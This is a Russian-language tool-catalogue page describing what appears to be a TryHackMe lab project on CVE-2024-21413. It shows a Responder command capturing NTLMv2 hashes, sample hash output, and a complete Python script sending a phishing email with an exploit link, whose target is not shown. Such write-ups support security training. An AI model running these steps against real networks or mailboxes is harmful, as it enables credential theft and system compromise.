Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — Демонстрирует захват NTLM-хэшей с помощью Responder и выполнение фишинговых писем, эксплуатирующих CVE-2024-21413 для компрометации систем. | Kitploit
Инструменты/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Разведка открытых источников)Взлом паролейРазведкаЭксплуатацияФишингСоциальная инженерияОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Демонстрирует захват NTLM-хэшей с помощью Responder и выполнение фишинговых писем, эксплуатирующих CVE-2024-21413 для компрометации систем.

Репозиторий
81 год назадЕщё не проверено

Project Goal: Проект был создан для демонстрации использования различных инструментов для захвата NTLM-хешей пользователей в сети и выполнения фишинговых атак с помощью электронной почты. Это показывает, как уязвимости сетевой аутентификации и фишинговые методы могут быть использованы для компрометации систем.

Process Description

  1. Capturing NTLM Hashes using Responder Изначально я использовал инструмент Responder для захвата хешей аутентификации в сети. Responder позволяет перехватывать такие запросы, как LLMNR, NBT-NS и MDNS, для сбора NTLM-хешей пользователей. Это важный шаг для атак, направленных на получение доступа к системам с использованием захваченных хешей.

Я выполнил следующую команду для запуска Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

Я настроил Responder на прослушивание интерфейса ens5. Он сразу же начал перехватывать запросы аутентификации, что позволило мне просмотреть NTLM-хеши пользователей в сети, таких как THM-MONIKERLINK\tryhackme и WORKGROUP\Administrator. Вот как выглядел вывод при захвате хешей:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

Эти хеши затем могут быть использованы для таких атак, как подбор пароля или атаки с использованием хешей.

  1. Phishing Emails with Exploit Затем я создал фишинговое письмо, содержащее ссылку на вредоносный файл. Используя Python-скрипт с библиотекой smtplib, я отправил письмо на адрес жертвы. Письмо содержало HTML-ссылку, которая выглядела безопасной, но на самом деле вела к файлу, предназначенному для эксплуатации уязвимости.

Фишинговая ссылка в письме выглядела так:

Click me

Вот полный Python-скрипт, использованный для отправки фишингового письма:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

Этот скрипт отправляет письмо с вредоносной ссылкой, которая потенциально может использовать уязвимость CVE-2024-21413.

Results В результате я смог продемонстрировать два ключевых аспекта:

Захват NTLM-хешей с помощью инструмента Responder, что является критическим шагом для атак на сетевую аутентификацию.

Фишинг и эксплуатация уязвимостей через электронную почту с помощью Python-скрипта. Отправка фишинговых писем с вредоносными ссылками может обмануть пользователей и привести к компрометации системы.

Этот проект показал, как сетевые уязвимости и фишинговые атаки могут быть использованы для получения доступа к системам. Он также подчеркнул важность защиты от таких атак с помощью надежных методов аутентификации и фильтрации почтового трафика.

Скачать инструмент